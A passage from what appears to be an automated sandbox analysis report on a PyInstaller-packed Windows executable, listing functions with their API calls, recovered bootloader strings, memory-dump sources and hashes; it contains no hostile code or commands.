                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                              • Instruction ID: 63462c7f4b32f9c2acfc77c6166963b8ee76abbc26d777aee52c129115aec120
                                                              • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                              • Instruction Fuzzy Hash: 3731C522B1A642D1EE129F02BC025B523D4FF48BA4F994576ED1DAB3D4EF3CE6448302
                                                              Function 00007FF623F76360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                              • API String ID: 2050909247-2434346643
                                                              • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                              • Instruction ID: 49bf678f85540dd60466c0782136129d3a5e9790cd91f341a3ed590aece44865
                                                              • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                              • Instruction Fuzzy Hash: BE418121A18686D1EE25DF20FC161E96361FF84384F904172DA5CAB695EF3CE719C342
                                                              Function 00007FF623F72A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF623F7351A,?,00000000,00007FF623F73F1B), ref: 00007FF623F72AA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                              • API String ID: 2050909247-2900015858
                                                              • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                              • Instruction ID: 8fdfac7c16d72a0986bcfbf3b3d37dbc246acf086a7355c201b30bb5bfafb7bf
                                                              • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                              • Instruction Fuzzy Hash: 34218E32A19B8192EB209F51BC827E66394FB887C4F404176EE8CA7659EF3CD6498741
                                                              Function 00007FF623F8B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 12f476f87c8743e70c8b210e20a22f1b01636e2fed05d2f1e0a082253e023e8e
                                                              • Instruction ID: 011e0e3c7b28f2617b294939225adf6d059f4047c531bfe4c2a902f0aad5bebd
                                                              • Opcode Fuzzy Hash: 12f476f87c8743e70c8b210e20a22f1b01636e2fed05d2f1e0a082253e023e8e
                                                              • Instruction Fuzzy Hash: AD216A20B0D74285FE6C6723BE5713952429F44BE0F0446B4D83EEBAD6EF2CAA008303
                                                              Function 00007FF623F97D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                              • Instruction ID: d3690d5f5adc6002b5100c9b676d0dfc04f9baa9e5b91c4c662e9b8a74fdc797
                                                              • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                              • Instruction Fuzzy Hash: 1B11D021B18B4186EB608F12FC5632962A0FB88FE4F008274EA5DD77A4DF7CDA54C742
                                                              Function 00007FF623F78ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF623F73FA9), ref: 00007FF623F78EFD
                                                              • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF623F73FA9), ref: 00007FF623F78F5A
                                                                • Part of subcall function 00007FF623F79390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF623F745F4,00000000,00007FF623F71985), ref: 00007FF623F793C9
                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF623F73FA9), ref: 00007FF623F78FE5
                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF623F73FA9), ref: 00007FF623F79044
                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF623F73FA9), ref: 00007FF623F79055
                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF623F73FA9), ref: 00007FF623F7906A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                              • String ID:
                                                              • API String ID: 3462794448-0
                                                              • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                              • Instruction ID: 2c53ece78454e4b07719661e04cfea62d7972435f305a6a4e15846e914faf7ef
                                                              • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                              • Instruction Fuzzy Hash: 6841A362A1968281EE309F22B9026BA73A4FB88BD4F444175DF4DEB799DF3CD600C701
                                                              Function 00007FF623F8B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,00007FF623F84F11,?,?,?,?,00007FF623F8A48A,?,?,?,?,00007FF623F8718F), ref: 00007FF623F8B2D7
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF623F84F11,?,?,?,?,00007FF623F8A48A,?,?,?,?,00007FF623F8718F), ref: 00007FF623F8B30D
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF623F84F11,?,?,?,?,00007FF623F8A48A,?,?,?,?,00007FF623F8718F), ref: 00007FF623F8B33A
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF623F84F11,?,?,?,?,00007FF623F8A48A,?,?,?,?,00007FF623F8718F), ref: 00007FF623F8B34B
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF623F84F11,?,?,?,?,00007FF623F8A48A,?,?,?,?,00007FF623F8718F), ref: 00007FF623F8B35C
                                                              • SetLastError.KERNEL32(?,?,?,00007FF623F84F11,?,?,?,?,00007FF623F8A48A,?,?,?,?,00007FF623F8718F), ref: 00007FF623F8B377
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 341ed06667cf8b6c5416a7ef0c6dfdccbf195f5bc763a811adde1679d5f4f530
                                                              • Instruction ID: f00d6afa48f6f6be69baa397b6aa43d1c59a6f99c05a2b81ad9ed6dfd4c8b05e
                                                              • Opcode Fuzzy Hash: 341ed06667cf8b6c5416a7ef0c6dfdccbf195f5bc763a811adde1679d5f4f530
                                                              • Instruction Fuzzy Hash: 87113B20B0D74286FE5C67227E9313D51429F54BF0F0546B4E82EE76E6EF6CAA018303
                                                              Function 00007FF623F72910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF623F71B6A), ref: 00007FF623F7295E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                              • API String ID: 2050909247-2962405886
                                                              • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                              • Instruction ID: f9a39529a5b234771d593de5a283665fe3fc7bae8116136f09332f594c06bfe4
                                                              • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                              • Instruction Fuzzy Hash: AF31E522B1868152EB20AB65BC426E76395BF887D4F404132FE8DE7759EF3CD64AC301
                                                              Function 00007FF623F72390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                              • String ID: Unhandled exception in script
                                                              • API String ID: 3081866767-2699770090
                                                              • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                              • Instruction ID: f58730723d54cc892e689ef77e84233e49d46a4fa7fb574409566fa4515cf1d1
                                                              • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                              • Instruction Fuzzy Hash: 6C316D32619A8288EF249F61FC562FA6360FF88784F404175EA4D9BB59DF3CD2058702
                                                              Function 00007FF623F72B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF623F7918F,?,00007FF623F73C55), ref: 00007FF623F72BA0
                                                              • MessageBoxW.USER32 ref: 00007FF623F72C2A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentMessageProcess
                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                              • API String ID: 1672936522-3797743490
                                                              • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                              • Instruction ID: 633c053749da599ea1d08711b777b20556a13f5dba891bad8f74c309546b88fb
                                                              • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                              • Instruction Fuzzy Hash: 13219F62718B4192EB209F15F8467AA63A4EB887C0F404136EA8DA7759EF3CD705C741
                                                              Function 00007FF623F72710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF623F71B99), ref: 00007FF623F72760
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                              • API String ID: 2050909247-1591803126
                                                              • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                              • Instruction ID: a31779226f15b1500ffc5330ede193b4cc07f4b1ea44a9b554c26a37e72fd7e9
                                                              • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                              • Instruction Fuzzy Hash: 4F218132A1878152EB209F51BC427E663A4FB887C4F404176EE8CA7659DF7CD6498741
                                                              Function 00007FF623F89A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                              • Instruction ID: 8098fd74451ce5bd59f3fff9dabd7091e178d9d553e75a76e61e078432e6afdd
                                                              • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                              • Instruction Fuzzy Hash: 7FF0C221B1970681FE148F25FC8A77A2330AF487A1F544275CA6E976F4CF2CD684C302
                                                              Function 00007FF623F99368 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                              • Instruction ID: 791fd5ebaaf16c9eec2790a5d4f1263c8d462d5d3f2eada70adb4a9037bdaeaf
                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                              • Instruction Fuzzy Hash: F3119322D58A0241FE541D5AFC9377B1174AF5C360E06C6B4EE6EB72D68F6C66814102
                                                              Function 00007FF623F8B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF623F8A5A3,?,?,00000000,00007FF623F8A83E,?,?,?,?,?,00007FF623F8A7CA), ref: 00007FF623F8B3AF
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF623F8A5A3,?,?,00000000,00007FF623F8A83E,?,?,?,?,?,00007FF623F8A7CA), ref: 00007FF623F8B3CE
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF623F8A5A3,?,?,00000000,00007FF623F8A83E,?,?,?,?,?,00007FF623F8A7CA), ref: 00007FF623F8B3F6
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF623F8A5A3,?,?,00000000,00007FF623F8A83E,?,?,?,?,?,00007FF623F8A7CA), ref: 00007FF623F8B407
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF623F8A5A3,?,?,00000000,00007FF623F8A83E,?,?,?,?,?,00007FF623F8A7CA), ref: 00007FF623F8B418
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: 076d9937837767d8c0599fb7139188ad361754fd070b51876ae2b58645e7f25c
                                                              • Instruction ID: a85c34f5a7a50c36fe70c635fdf49829a5bd3280ba5fd05f7323be48775d591b
                                                              • Opcode Fuzzy Hash: 076d9937837767d8c0599fb7139188ad361754fd070b51876ae2b58645e7f25c
                                                              • Instruction Fuzzy Hash: 64115C20F0970245FE5C9727BD5353961419F447E0F4842B4E82EE76D6DF2CEA028303
                                                              Function 00007FF623F8B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: 84df6eade7ca2759e64539926e88efdc2e23a1e9973d593929f07b0eae7a4c09
                                                              • Instruction ID: 897afbefc27d387e944412d4a48e8fe26f83caa628e8bffdee15e09dbafc03dc
                                                              • Opcode Fuzzy Hash: 84df6eade7ca2759e64539926e88efdc2e23a1e9973d593929f07b0eae7a4c09
                                                              • Instruction Fuzzy Hash: 4011C220A0930685FE6D62677C5317A11424F557B0F194BB4D92EEB6E2EF2CBA418253
                                                              Function 00007FF623F85FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: verbose
                                                              • API String ID: 3215553584-579935070
                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                              • Instruction ID: 9b1ddb9f930ac8a0382179b89d1893d767a0009ce23476d21b76f577d090fc1f
                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                              • Instruction Fuzzy Hash: 9891B022A08A4681EF698E26EC5277D3791AB40BD4F4441B6DB9DA73D6DF3CE6058302
                                                              Function 00007FF623F8FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                              • API String ID: 3215553584-1196891531
                                                              • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                              • Instruction ID: d0f405f449d67e65ee606cea154faa0e2ece8266dbad4d760375eee68137ddbf
                                                              • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                              • Instruction Fuzzy Hash: 8C819173E183428DEF6C5E27B94627926A0AF11BC8F5640B5CA09F7295CF2DEB019303
                                                              Function 00007FF623F7D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
